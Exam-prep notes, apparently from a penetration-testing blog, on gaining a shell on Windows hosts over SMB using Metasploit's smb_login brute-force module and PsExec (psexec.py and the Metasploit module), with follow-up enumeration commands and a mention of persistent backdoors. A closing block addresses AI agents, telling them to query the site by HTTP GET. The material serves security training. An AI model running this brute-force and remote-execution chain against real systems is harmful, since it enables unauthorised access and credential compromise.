# Exploiting SMB With PsExec

## **SMB:**

* SMB (Server Message Block) is a network file sharing protocol that is used to facilitate the sharing of files and peripherals (printers and serial ports) between computers on a local network (LAN).
* SMB uses port 445 (TCP). However, originally, SMB ran on top of NetBIOS using port 139.
* SAMBA is the open source Linux implementation of SMB, and allows Windows systems to access Linux shares and devices. \</aside>

## SMB Authentication:

* The SMB protocol utilizes two levels of authentication, namely:
  * User Authentication
  * Share Authentication
* User authentication - Users must provide a username and password in order to authenticate with the SMB server in order to access a share.
* Share authentication - Users must provide a password in order to access restricted share.

Note: Both of these authentication levels utilize a challenge response authentication system.

<figure><img src="/files/WVVfTWwxAlfapZhdwQe4" alt=""><figcaption></figcaption></figure>

## PsExec Tool

* [**`PsExec`**](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec) is a lightweight telnet-replacement tool developed by Microsoft that allows you to execute processes on remote Windows systems using any user’s credentials.
* Authentication with PsExec is performed via SMB.
* It can be used to authenticate with the target system legitimately and run arbitrary commands or launch a remote command prompt.
* PsExec is similar to RDP but instead of controlling the remote system via a GUI, commands are sent via CMD.

## SMB Exploitation With PsExec

* To utilize PsExec for gaining access to a Windows target, we need to identify legitimate user accounts along with their respective passwords or password hashes.
* Various tools and techniques can be employed for this purpose, but a common approach is to perform an SMB login brute-force attack.
* To enhance the efficiency of the brute-force attack, we can focus on common Windows user accounts such as `Administrator`.
* Once we have obtained valid user credentials, we can use PsExec to authenticate with the target system, allowing us to execute arbitrary system commands or establish a reverse shell.

## Attack Flow for the SMB With **Metasploit** & PsExec

### 1. **Verify SMB Service**

**Objective:** Confirm whether the target host has the SMB service enabled.

**Command:**

```bash
nmap -p 445 <Target_IP>
```

**Description:** Scan port 445 on the target system to check if SMB (Server Message Block) service is available.

### 2. **Identify Valid Credentials**

**Objective:** Obtain valid credentials to access the SMB service.

**Command:**

```bash
msfconsole
```

**In Metasploit Framework:**

```bash
use auxiliary/scanner/smb/smb_login
set RHOSTS <Target_IP>
set USER_FILE <path_to_user_list>
set PASS_FILE <path_to_password_list>
run
```

**Description:** Use the `smb_login` module in Metasploit to perform a brute-force attack or credential stuffing to find valid SMB user credentials.

### 3. **Gain Command-Line Access**

**Objective:** Use valid credentials to get command-line access on the target system.

**Method A: Using `psexec.py`**

**Command:**

```bash
psexec.py <user>@<Target_IP> cmd.exe
```

**Description:** Execute the `cmd.exe` shell on the target system using `psexec.py`, the Linux version of the PsExec tool.

#### **Method B: Using Metasploit’s `psexec` Module**

**Command:**

```bash
use exploit/windows/smb/psexec
set RHOSTS <Target_IP>
set SMBUser <user>
set SMBPass <password>
exploit
```

**Description:** Use the `psexec` exploit module in Metasploit to run `cmd.exe` on the target system with the provided credentials.

### 4. **Post-Exploitation Actions**

**Objective:** Perform further actions on the target system once command-line access is established.

**Examples:**

* **Enumerate system information:**

  ```cmd
  systeminfo
  ```
* **Check for connected users:**

  ```cmd
  query user
  ```
* **List running processes:**

  ```cmd
  tasklist
  ```
* **Establish a persistent backdoor or further exploit vulnerabilities.**

***

***

***

**`Hacker's Mantra:`**`Hackers are becoming more sophisticated in conjuring up new ways to hijack your system by exploiting technical vulnerabilities or human nature. Don’t become the next victim of unscrupulous cyberspace intruders. -`` `**`Kevin Mitnick`**


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/system-host-based-attacks/exploiting-windows-vulnerabilities/exploiting-smb-with-psexec.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.